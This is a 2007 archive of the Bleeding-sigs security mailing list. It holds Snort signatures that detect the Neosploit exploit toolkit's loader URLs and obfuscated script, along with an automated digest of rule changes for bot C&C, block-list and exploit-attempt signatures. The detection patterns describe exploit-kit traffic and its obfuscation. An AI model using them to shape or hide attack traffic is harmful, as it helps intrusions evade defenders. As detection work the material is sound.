>> Matt was also generous enough to host the DNS-BH zone files and
>> integrate in his sandnet data to provide true 0-day bleeding-edge
>> domains to the dns-bh list.
>> 
>> I'm sure I join everyone in wishing him the best of luck and thanks
> for
>> his dedication and his time and efforts in the bleeding-edge
> community.
>> 
>> 
>> ----
>> 
>>
>> 
>> 
>>
>>
>> 
>> ----- Original Message ----
>> From: Matt Jonkman <jonkman@jonkmans.com <mailto:jonkman@jonkmans.com>>
>> To: Bleeding Sigs <bleeding-sigs@bleedingthreats.net
> <mailto:bleeding-sigs@bleedingthreats.net>>
>> Sent: Wednesday, November 21, 2007 4:43:53 AM
>> Subject: Re: [Bleeding-sigs] Blackhole DNS
>>
>> David decided to move that somewhere else while there's so much
>> uncertainty in the project. He'll announce a new home very soon I'm
> sure.
>>
>> matt
>>
>> John H. Sawyer wrote:
>>> What happened to the DNS blackhole lists?
>>>
>>> http://www.bleedingthreats.net/blackhole-dns/files/
>>>
>>> -jhs
>>> _______________________________________________
>>> Bleeding-sigs mailing list
>>> Bleeding-sigs@bleedingthreats.net
> <mailto:Bleeding-sigs@bleedingthreats.net>
>> <mailto:Bleeding-sigs@bleedingthreats.net
> <mailto:Bleeding-sigs@bleedingthreats.net>>
>>>
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
>>
>> --
>> --------------------------------------------
>> Matthew Jonkman
>> Bleeding Edge Threats
>> US Phone 765-429-0398
>> US Fax 312-264-0205
>> AUS Phone 61-42-4157-491
>> AUS Fax 61-29-4750-026
>> http://www.bleedingthreats.net <http://www.bleedingthreats.net/>
> <http://www.bleedingthreats.net/>
>> --------------------------------------------
>>
>> PGP: http://www.bleedingthreats.com/mattjonkman.asc
>>
>>
>> _______________________________________________
>> Bleeding-sigs mailing list
>> Bleeding-sigs@bleedingthreats.net
> <mailto:Bleeding-sigs@bleedingthreats.net>
> <mailto:Bleeding-sigs@bleedingthreats.net
> <mailto:Bleeding-sigs@bleedingthreats.net>>
>>
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
>>
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net <mailto:Bleeding-sigs@bleedingthreats.net>
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net <mailto:Bleeding-sigs@bleedingthreats.net>
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
From dxp2532 at gmail.com  Thu Dec  6 16:40:20 2007
From: dxp2532 at gmail.com (dxp)
Date: Thu Dec  6 16:46:52 2007
Subject: [Bleeding-sigs] [Fwd: Several signatures to detect Neosploit
	exploit toolkit attacks]
In-Reply-To: <47509DCE.5070500@gmail.com>
References: <474FAA3F.4040105@sensorynetworks.com> <47509DCE.5070500@gmail.com>
Message-ID: <1196959220.5766.4.camel@kinta>

UPDATE:
	Came across an active exploit and the loader URL for 1.5.x needs slight
modification (last {10} -> {9,10}):

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
	msg:"LOCAL Neosploit 1.5.x URL Loader"; 
	flow:to_server,established;
	content:"GET"; depth:3;
	pcre:"/\?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}_\d{9,10}[_\da-z]{0,9}\s
+HTTP\/[01]{1}\.[01]{1}\r\n/i";
	sid:2007253202; rev:1;
)

On Fri, 2007-11-30 at 18:33 -0500, Blake Hartstein wrote:
> For those of you that didn't eat your regular expressions for breakfast,
> one of those URLs might look like: (where \d is a number 0-9)
> 
> http://site/page?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}[_\da-z]{0,6}
> 
> So, it looks like we detect a bunch of numbers and underscores... 
> dpx, do you have a reference or sample packet capture for this activity? I see a lot of other URLs for neosploit, but never this one.
> 
> Blake
> System Administrator wrote:
> > We received these rules on the bleeding@bleedingthreats.net alias, but
> > they seem more appropriate for the Bleeding Sigs mailing list.
> >
> > dxp, thank you for your contribution and if you wish to join the mailing
> > list, please visit
> > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> >
> > Kind regards,
> > David Taylor.
> >
> > -------- Original Message --------
> > Subject: Several signatures to detect Neosploit exploit toolkit attacks
> > Date: Tue, 27 Nov 2007 11:04:14 -0500
> > From: dxp <dxp2532@gmail.com>
> > To: bleeding@bleedingthreats.net
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"LOCAL
> > Neosploit 1.0.x URL Loader"; flow:to_server,established; content:"GET";
> > depth:3;
> > pcre:"/\?u[0-9]{1}_[0-9]{1}_[0-9]{3,4}_[0-9]{1}_[0-9]{1}_[0-9]{10}_[0-9]{10}[_0-9a-z]{0,6}\s+HTTP\/[01]{1}\.[01]{1}\r\n/i";
> > sid:2007253201; rev:2;)
> > #
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"LOCAL
> > Neosploit 1.5.x URL Loader"; flow:to_server,established; content:"GET";
> > depth:3;
> > pcre:"/\?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}_\d{10}[_\da-z]{0,9}\s+HTTP\/[01]{1}\.[01]{1}\r\n/i";
> > sid:2007253202; rev:1;)
> > #
> > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"LOCAL
> > Neosploit script"; flow:established,from_server; content:"<script ";
> > depth:50; nocase; content:"javascript"; distance:5; within:30; nocase;
> > content:"arguments.callee.toString().replace(/\\W/g,"; nocase;
> > distance:10; within:100; sid:2007253203; rev:1;)
> >   
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Bleeding-sigs mailing list
> > Bleeding-sigs@bleedingthreats.net
> > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
> >   
> 
-- 

-=[ dxp ]=-
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xA3F3C6E3
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.bleedingthreats.net/pipermail/bleeding-sigs/attachments/20071206/18b378ab/attachment.pgp
From bleeding at bleedingthreats.net  Fri Dec  7 22:00:17 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Fri Dec  7 22:00:26 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Weekly Signature Changes
Message-ID: <20071207220020.C9DEB230005@sb03.us.bleedingsnort.com>


[***] Results from Oinkmaster started Fri Dec  7 22:00:17 2007 [***]

[+++]          Added rules:          [+++]

 2007704 - BLEEDING-EDGE WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt (bleeding-web.rules)
 2404016 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 17)  (bleeding-botcc.rules)
 2405016 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)


[///]     Modified active rules:     [///]

 2007703 - BLEEDING-EDGE WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt (bleeding-web.rules)
 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1)  (bleeding-botcc.rules)
 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2)  (bleeding-botcc.rules)
 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3)  (bleeding-botcc.rules)
 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4)  (bleeding-botcc.rules)
 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5)  (bleeding-botcc.rules)
 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6)  (bleeding-botcc.rules)
 2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7)  (bleeding-botcc.rules)
 2404007 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 8)  (bleeding-botcc.rules)
 2404008 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 9)  (bleeding-botcc.rules)
 2404009 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 10)  (bleeding-botcc.rules)
 2404010 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 11)  (bleeding-botcc.rules)
 2404011 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 12)  (bleeding-botcc.rules)
 2404012 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 13)  (bleeding-botcc.rules)
 2404013 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 14)  (bleeding-botcc.rules)
 2404014 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 15)  (bleeding-botcc.rules)
 2404015 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 16)  (bleeding-botcc.rules)
 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405007 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405008 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405009 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405010 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405011 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405012 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405013 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405014 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
 2405015 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to bleeding-drop-BLOCK.rules (2):
        #  VERSION 377
        #  Generated 2007-12-04 00:03:01 EDT

     -> Added to bleeding-drop.rules (2):
        #  VERSION 377
        #  Generated 2007-12-04 00:03:01 EDT

     -> Added to bleeding-sid-msg.map (3):
        2007704 || BLEEDING-EDGE WEB-CLIENT Apple Quicktime RTSP Content-Type overflow attempt || url,www.milw0rm.com/exploits/4657 || url,www.kb.cert.org/vuls/id/659761
        2404016 || BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 17)  || url,www.shadowserver.org
        2405016 || BLEEDING-EDGE DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE || url,www.shadowserver.org

[---]     Removed non-rule lines:    [---]

     -> Removed from bleeding-drop-BLOCK.rules (2):
        #  VERSION 372
        #  Generated 2007-11-15 23:24:08 EDT

     -> Removed from bleeding-drop.rules (2):
        #  VERSION 372
        #  Generated 2007-11-15 23:24:08 EDT

     -> Removed from bleeding-sid-msg.map (198):
        2500255 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (256) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (257) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (258) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500258 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (259) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500259 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (260) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500260 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (261) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500261 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (262) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500262 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (263) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500263 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (264) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500264 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (265) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500265 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (266) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500266 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (267) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500267 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (268) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500268 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (269) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500269 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (270) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500270 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (271) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500271 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (272) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500272 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (273) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500273 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (274) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500274 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (275) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500275 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (276) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500276 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (277) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500277 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (278) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500278 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (279) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500279 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (280) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500280 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (281) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500281 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (282) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500282 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (283) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500283 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (284) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500284 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (285) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500285 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (286) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500286 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (287) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500287 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (288) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500288 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (289) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500289 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (290) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500290 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (291) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500291 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (292) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500292 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (293) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500293 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (294) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500294 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (295) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500295 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (296) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500296 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (297) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500297 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (298) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500298 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (299) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500299 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (300) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500300 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (301) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500301 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (302) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500302 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (303) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500303 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (304) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500304 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (305) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500305 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (306) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500306 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (307) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500307 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (308) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500308 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (309) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500309 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (310) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500310 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (311) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500311 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (312) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500312 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (313) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500313 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (314) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500314 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (315) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500315 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (316) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500316 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (317) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500317 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (318) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500318 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (319) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500319 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (320) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500320 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (321) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500321 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (322) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500322 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (323) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500323 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (324) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500324 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (325) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500325 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (326) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500326 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (327) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500327 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (328) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500328 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (329) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500329 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (330) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500330 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (331) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500331 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (332) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500332 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (333) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500333 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (334) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500334 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (335) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500335 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (336) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500336 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (337) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500337 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (338) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500338 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (339) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500339 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (340) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500340 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (341) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500341 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (342) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500342 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (343) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500343 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (344) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500344 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (345) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500345 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (346) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500346 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (347) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500347 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (348) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500348 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (349) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500349 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (350) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500350 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (351) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500351 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (352) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500352 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (353) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500353 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (354) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (256) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (257) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (258) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510258 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (259) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2510259 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (260) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
